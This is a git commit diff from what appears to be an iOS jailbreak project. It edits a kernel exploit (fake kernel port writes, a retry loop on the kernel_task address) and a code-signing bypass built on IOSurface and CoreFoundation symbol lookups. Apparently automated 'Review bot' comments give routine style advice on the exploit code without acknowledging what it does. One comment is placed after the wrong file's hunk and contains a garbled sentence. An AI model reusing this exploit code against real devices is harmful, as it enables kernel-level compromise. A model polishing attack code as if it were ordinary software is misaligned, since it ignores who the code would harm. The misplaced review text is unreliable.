| author | spv420 <spv@spv.sh> | 2022-07-29 14:32:40 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-07-29 14:32:40 -0400 |
| commit | fa472ec3d9b5cdb2c1517cf2795ed65434867078 (patch) | |
| tree | 187b690920b03615d8a9cf7f1550e66ac4b1857f /src | |
| parent | eb2358cbd63c897227d5aaa3a1fc3844ad09e26b (diff) | |
fuck this shit i'm out seriously fuck you
Diffstat (limited to 'src')
| -rw-r--r-- | src/js/csbypass.js | 7 | ||||
| -rwxr-xr-x | src/js/kexp/exploit.js | 12 | ||||
| -rw-r--r-- | src/js/main.js | 4 |
3 files changed, 17 insertions, 6 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js
index 12388a0..cc9302f 100644
--- a/src/js/csbypass.js
+++ b/src/js/csbypass.js
@@ -13,6 +13,7 @@ var my_kIOSurfaceBytesPerRow;
 var my_kIOSurfaceWidth;
 var my_kIOSurfaceHeight;
 var my_kIOSurfacePixelFormat;
+var kCFAllocatorDefault;
 function csbypass() {
 printf("hello from csbypass!\n");
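Review bot: The new global `var kCFAllocatorDefault;` is named like the CoreFoundation constant, but in the other two csbypass.js hunks of this commit it receives the address returned by dlsym() and is then dereferenced with `read_u32(kCFAllocatorDefault)`, so it holds a symbol address, not the allocator value. The file's convention for such globals is the `_addr` suffix (`CFDictionarySetValue_addr`, `CFShow_addr`, `CFNumberCreate_addr` in the next hunk). Declaring it as `var kCFAllocatorDefault_addr;` here, and renaming the assignment in the `linkIOSurface()` hunk and the `read_u32(...)` use in the `memcpy_exec` hunk to match, keeps the address-versus-value distinction visible at each use. The same naming point applies to those two hunks and is not repeated there.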
@@ -34,11 +35,12 @@ function memcpy_exec(dst, src, size) {
 printf("%x %x\n", CFDictionarySetValue_addr + get_dyld_shc_slide(), dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue"));
 dict = CFDictionaryCreateMutable(0, 0, kCFTypeDictionaryKeyCallBacks_addr + get_dyld_shc_slide(), kCFTypeDictionaryValueCallBacks_addr + get_dyld_shc_slide());
 printf("dict: %p\n", dict);
- var test = CFNumberCreate(0, kCFNumberSInt32Type, pitch);
+ var test = CFNumberCreate(read_u32(kCFAllocatorDefault), kCFNumberSInt32Type, pitch);
 printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict));
 scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12));
 callnarg(CFShow_addr + get_dyld_shc_slide(), dict);
- CFDictionarySetValue(dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0);
+ CFDictionarySetValue(dict, read_u32(my_kIOSurfaceBytesPerRow), test, 0);
+ printf("lol420\n");
 CFDictionarySetValue(dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
 CFDictionarySetValue(dict, read_u32(my_kIOSurfaceHeight), read_u32(my_kIOSurfaceHeight + 4), read_u32(my_kIOSurfaceHeight + 8), read_u32(my_kIOSurfaceHeight + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, height));
 CFDictionarySetValue(dict, read_u32(my_kIOSurfacePixelFormat), read_u32(my_kIOSurfacePixelFormat + 4), read_u32(my_kIOSurfacePixelFormat + 8), read_u32(my_kIOSurfacePixelFormat + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pixel_format));
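Review bot: The changed `var test = CFNumberCreate(read_u32(kCFAllocatorDefault), ...)` line now takes its allocator from the looked-up symbol, while the three `callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, ...)` calls lower in the same hunk still pass `0`; if both forms are meant to be equivalent the change is cosmetic, and if not, the other three are now inconsistent with it. A one-line comment on the `var test` line stating which is intended would settle that for the next reader. The added `printf("lol420\n");` is a bare progress marker that says nothing without the source open; a message naming the step, e.g. `printf("csbypass: BytesPerRow entry set\n");`, makes the trace readable on its own. The enclosing function starts and ends outside this hunk.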
@@ -61,6 +63,7 @@ function linkIOSurface() {
 my_IOSurfaceAcceleratorTransferSurface = dlsym(h, "IOSurfaceAcceleratorTransferSurface");
 CFDictionarySetValue_addr = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue") - get_dyld_shc_slide();
+ kCFAllocatorDefault = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "kCFAllocatorDefault");
 scall("printf", "%x %x %x\n", my_IOSurfaceAcceleratorCreate, my_IOSurfaceCreate, my_IOSurfaceAcceleratorTransferSurface);
 }
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 6f34aaf..47ff1c0 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -502,10 +502,15 @@ again: while (true) {
 printf("fuck\n");
 printf("fuck\n");
- write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
+ for (var i = 0; i < 0x78; i += 4) {
+ write_u32(kport + i, 0x41410000 | i);
+ }
+ for (var i = 0; i < 0x78; i += 4) {
+ write_u32(kport + i + 0x78, 0x41420000 | i);
+ }
+// write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
 printf("fuck\n");
 // write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
- write_u32(ptr, 0x41414141 - BSDINFO_PID_OFFSET);
 printf("fuck\n");
 var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
 printf("fuck\n");
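Review bot: The added `kCFAllocatorDefault = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "kCFAllocatorDefault");` opens CoreFoundation a second time on the line directly after the `CFDictionarySetValue_addr` lookup does the same, whereas the IOSurface lookups in this function reuse one handle `h`. Opening it once, `var cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW);`, and using `dlsym(cf, ...)` for both CoreFoundation lookups keeps the two styles in this function consistent. The lookup result is also stored without being checked, unlike nothing else here that would catch it, so a failed lookup is only noticed later where the global is dereferenced; a check right after the assignment would localize the failure to this function. `linkIOSurface()` starts before this hunk.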
@@ -539,6 +544,9 @@ again: while (true) {
 printf("IF YOU SEE THIS AND IT LOOKS LEGIT, SHIT HAS FUCKING HAPPENED\n");
 printf("fuck\n");
 call4arg(sym_cache["puts"], sptr("kernel_task address: 0x" + pad_left(read_u32(kernel_task_addr).toString(16), '0', 8)), 0, 0, 0);
+ if (kernel_task_addr === 0xffffffff) {
+ continue again;
+ }
 scall("printf", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
 printf("fuck\n");
diff --git a/src/js/main.js b/src/js/main.js
index 75d730d..0a1de50 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -79,9 +79,9 @@ function main() {
 setup_fancy_rw();
-// csbypass();
+ csbypass();
-// return;
+ return;
 printf("%s\n", hexdump(read_buf(0x422200, 0x200), 8, 2, 0x422200, 8, '0')); |
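Review bot: In the main.js hunk the uncommented `return;` right after `csbypass();` makes the following `printf("%s\n", hexdump(read_buf(0x422200, 0x200), ...))` and everything after it in `main()` unreachable, and nothing in the hunk marks this as deliberate. If it is a temporary switch while csbypass() is being worked on, say so on the line, e.g. `return; // TODO: temporary — skip the rest of main() while csbypass() is being debugged`; otherwise the dead code below it should be removed rather than left to confuse the next reader. `main()` continues past the end of this hunk.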
